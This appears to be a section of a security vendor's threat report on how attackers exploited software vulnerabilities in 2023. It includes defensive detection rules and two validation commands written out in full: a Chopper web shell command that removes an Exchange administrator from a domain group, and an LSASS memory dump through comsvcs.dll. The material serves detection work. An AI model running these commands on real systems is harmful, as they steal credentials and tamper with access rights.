Trend
Vulnerabilities
Despite some shiny new vulnerabilities in the headlines, adversaries’ post-exploitation playbooks have largely remained the same.
Pairs With This Song
Threat sounds
While new CVEs like the MOVEit zero day made headlines, adversaries exploited plenty of years-old (maybe less catchy) vulnerabilities throughout 2023 as well.
Addressing vulnerabilities is a fundamental part of information security, and security professionals often have mixed reactions to the disclosure of new ones. Between the catastrophic reaction of “cancel all your weekends” to the lax perspective of “that’s next month’s problem,” there is a healthy medium we can approach as a community to address vulnerabilities and prepare our organizations for malicious activity.
Vulnerabilities exist in nearly every nontrivial application, and they range wildly in severity, from the ridiculously simple to the massively complex. While many vulnerabilities don’t pose a great threat to organizations, the ones that do often play specific roles in adversary operations. For example, adversaries commonly use remote code execution (RCE) vulnerabilities in software such as Microsoft Exchange to gain a foothold in enterprise networks. SQL injection vulnerabilities can be used against misconfigured applications and database servers to allow code execution on database servers. Some vulnerabilities also provide evergreen opportunities for adversaries to deploy malware, despite being patched many years earlier. Adversaries have both a long memory and a tendency to adopt new exploitation technology rapidly, so it pays to patch early and often, or to architect your network in ways that minimally expose vulnerabilities to the internet.
What we saw in 2023
In 2023 we observed multiple high and critical severity vulnerabilities exploited in the wild, and each of them played a specific role in a larger attack path. In fact, the larger attack path was often consistent enough that the vulnerability used for initial access could easily be swapped out for new vulnerabilities as adversaries evolved. The most common path included these steps:
- Exploit a public-facing server or web application.
- Transfer a web shell or RAT.
- Get credentials.
- Move laterally from foothold.
As the year progressed, we observed vulnerabilities such as those found in TeamCity, Progress Software WS_FTP, PaperCut, and more filling that first role. Applications on Windows systems weren’t the only ones affected, either. Vulnerabilities such as CitrixBleed affected specialized network appliances designed to sit on the edge of a network, and their exploitation provided a way for adversaries to gain their foothold on systems that often did not support adequate endpoint monitoring. While new vulnerabilities often make the news, adversaries also revisited some older vulnerabilities this year, dredging up exploits for older Telerik, ManageEngine, and Fortinet vulnerabilities. It bears mentioning often: If a vulnerable application is facing the internet, it will be exploited.
Predictable post-exploitation
Immediately after exploitation, the adversaries nearly always took a step to transfer tools to that compromised system. At this point, we often observed PowerShell, certutil.exe
, or curl.exe
commands used to make that compromised system download a remote access tool such as Cobalt Strike or AnyDesk. In other cases, the adversary would upload a web shell to the compromised server. This was the case in the large-scale exploitation of MOVEit Transfer in May 2023. In the case of the ManageEngine exploitation mentioned earlier, the adversaries used variations of the tried-and-true Chopper web shell.
At this step, the adversaries often worked to gain credentials or escalate privileges on the initial compromised system. In the case of compromised web servers, we often observe adversaries using RottenPotato and similar exploits to escalate from web application accounts to a Windows local SYSTEM
account. In other cases, adversaries would attempt to dump OS credentials using a method such as dumping the memory of LSASS.exe
on Windows systems. Despite the wide variety of vulnerabilities used during initial access, credential access at this stage nearly always narrowed to the use of Mimikatz, Task Manager, or COMSVCS.dll
to dump LSASS for credential access attacks. In the case of network appliances such as Citrix Application Delivery Controllers, adversaries could uncover credentials from configuration files or with additional exploits.
If a vulnerable application is facing the internet, it will be exploited.
Once credentials were obtained, the adversaries needed to move from their initial foothold to other systems to continue their operations. Despite the variety of initial access vulnerabilities, this activity again narrowed down to just a few options. With tools such as Cobalt Strike and Windows-based RATs, adversaries could use their credentials with Windows-native protocols like WMI and SMB to move between systems and issue remote commands. Non-Windows footholds such as Citrix appliances also offered options for lateral movement, allowing adversaries to use tools like Impacket WMIexec and SMBexec to move from exploited appliances into other areas of a network.
The biggest finding for the year for us is that even if the vulnerabilities are new or rapidly changing, adversary behavior stays the same once they gain access. You can swap out pieces of the intrusion chain with a new, shiny exploit, but reality has shown us that adversaries revert to a predictable playbook once they gain access.
Take action
The best prevention is to patch, be mindful of surface area exposed to the internet, and have a good incident response plan. If you’re not sure whether your organization uses applications that have been exploited by adversaries, a good place to start evaluating is the Known Exploited Vulnerabilities Catalog maintained by CISA. You can cross-reference vulnerable applications in that catalog against applications your organization uses and evaluate the level of risk they pose.
When you do identify vulnerable applications in your organization, it’s important to take a calm and systematic approach to evaluating the vulnerabilities and prioritizing their fixes. We recommend focusing first on vulnerabilities that result in unauthenticated remote code execution and file uploads, as they can result in content being introduced to your systems without authorization. From there, you can work down the list toward less risky vulnerabilities that require complex effort or specialized circumstances to exploit.
Detection opportunities
Vulnerability exploitation often involves manipulating network traffic and portions of memory in ways that aren’t effectively captured by endpoint detection and response sensors. As a result, we focus on behaviors that commonly occur around this exploitation. The following is a non-comprehensive running list of common suspicious behaviors we’ve observed in conjunction with vulnerability exploitation. We’ve chosen to leave detection opportunities included in the 2022 version of this report since adversaries often exploit vulnerabilities over a period of many years.
Chopper webshell commands on Windows
Chopper, often called “ChinaChopper” in some circles, executes Windows OS commands in a way that’s pretty easy to target behaviorally. They spawn from w3wp.exe
and appear with command lines containing cmd
and echo
.
parent_process == w3wp.exe
&&
command_includes (“cmd.exe” && “echo”)
You can use the following command to validate the above detection opportunity.
“cmd" /c cd /d "C:\\inetpub\\wwwroot\\aspnet_client\\system_web"&net group "Exchange Organization administrators" administrator /del /domain&echo [S]&cd&echo [E]
Certutil downloading additional payloads
Adversaries often use certutil.exe
to download payloads during exploitation because it’s included with all Windows systems by default. It’s also pretty easy to detect downloads using the tool.
process == certutil.exe
&&
command_includes (“urlcache” && “split” && “-f”)
LSASS memory dumping with COMSVCS.dll
Adversaries often follow exploitation with attempts to capture credentials from LSASS memory. One way they do this is using COMSVCS.dll
to capture memory.
process == rundll32.exe
&&
command_includes (“minidump”)
You can validate the above detection opportunity by running the following command:
rundll32.exe comsvcs.dll,minidump 4796 dump.dmp full
Note: The remaining detection opportunities were originally included in the 2022 Threat Detection Report but we’re including them here because adversaries may still exploit them when possible.
ProxyLogon (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065)
In March 2021, Microsoft released details of four Exchange Server vulnerabilities collectively known as “ProxyLogon.” If chained together, the vulnerabilities would allow an adversary remote code execution on a targeted Exchange server. Multiple adversaries, including the suspected Chinese state-sponsored group HAFNIUM, used the vulnerability chain to drop web shells and collect data from thousands of Exchange servers. Other adversaries used the DearCry ransomware to target unpatched servers as well. Microsoft released patches for these vulnerabilities at the time of initial reporting.
Microsoft Exchange Mailbox Replication service writing Active Server pages
Adversaries exploited ProxyLogon to drop web shells on vulnerable systems, which manifested through the msexchangemailboxreplication.exe
service writing an ASPX file to disk. Malicious web shells will likely be placed on the web server in a web-accessible directory. The following analytic looks for the Exchange mailbox replication service creating ASPX files.
process == 'msexchangemailboxreplication.exe'
&&
filemod_extension == '.aspx'
ProxyShell (CVE-2021-31207, CVE-2021-34523, CVE-2021-34473)
In July of 2021, Microsoft released details of three new vulnerabilities in the Exchange server, which were dubbed “ProxyShell.” ProxyShell exploitation allows an adversary to remotely execute code without authentication. Following the exploitation, adversaries dropped web shells to conduct reconnaissance, move laterally, and in some instances, deploy ransomware. Where ProxyLogon seemed to have a high impact over a short period of time, ProxyShell seemed to persist longer. DetectingProxyShell exploitation is similar to ProxyLogon mentioned above, specifically msexchangemailboxreplication.exe
writing an ASPX web shell to disk.
PrintNightmare (CVE-2021-34527)
Also in July of 2021, security researchers and Microsoft released details of a new vulnerability dubbed “PrintNightmare” (CVE-2021-34527). PrintNightmare permits an unprivileged user to remotely obtain elevated privileges on any system running the print spooler service, which is enabled by default. It abuses a vulnerability in how the print spooler service fails to properly authenticate users attempting to load a printer driver dynamic link library (DLL). This zero day affected all editions of Windows, allowing code execution with local SYSTEM-level privileges.
Though the vulnerability was concerning, there were not many reported campaigns exploiting it. That said, ransomware operators such as Vice Society and Magniber have exploited the vulnerability to gain initial access, and therefore it’s worth looking out for. We observed a single malicious instance of PrintNightmare exploitation leading to precursor ransomware behaviors.
Windows print spooler service spawning cmd.exe
PrintNightmare exploitation results in a shell being opened on the targeted system as a child process of the spooler service. This detection analytic identifies the Windows print spooler service spawning a shell on the system.
parent_process == spoolsv.exe
&&
process == cmd.exe
Kaseya VSA (CVE-2021-30116)
Again in July 2021, adversaries leveraged multiple vulnerabilities in Kaseya Virtual Systems Administrator (VSA) to distribute Sodinokibi ransomware, also known as REvil. VSA allows IT administrators to remotely administer endpoints. By compromising this software, an adversary gains remote execution capability to a large subset of customer endpoints, especially if Kaseya is operated by a managed service provider (MSP).
Red Canary detected the initial behavioral activity using a preexisting analytic for identifying certutil.exe
decoding content, as detailed below. Our Intelligence team had tracked Sodinokibi prior to this, which helped us identify the malicious registry modification of blacklivesmatter
seen below and attribute it to Sodinokibi.
Certificate utility tool (certutil.exe
) decoding content
This detection analytic will detect certutil.exe
running with the -decode
option. Adversaries frequently leverage certutil to decode Base 64-encoded content.
process == certutil.exe
&&
command_includes ('decode')
ManageEngine products (CVE-2021-40539, CVE-2021-44077, CVE-2021-44515)
In November and December of 2021, we observed likely exploitation of remote code execution vulnerabilities in two different Zoho ManageEngine products: ADSelfService Plus (CVE-2021-40539) and ServiceDesk Plus (CVE-2021-44077). In one case, an incident response partner determined that ADSelfService Plus was used for initial access prior to deploying ransomware. The FBI noted that advanced adversaries exploited a vulnerability in a third ManageEngine product, Desktop Central. ManageEngine products are widely used among IT departments to manage various services across the enterprise. As such, this presents adversaries with a wide attack surface. Organizations using ManageEngine products in their environment should update accordingly. Patches for all the vulnerabilities listed here are available via ManageEngine.
Keytool.exe
spawning system shell or PowerShell
For the vulnerability in ADSelfService Plus (CVE-2021-40539), we observed adversaries use the Java utility Keytool to move a web shell from the initial directory it was dropped into. As such, keytool.exe
spawning shells should be investigated, and the following detection analytic should surface related activity.
parent_process == keytool.exe
&&
process == ('cmd.exe' || 'powershell.exe')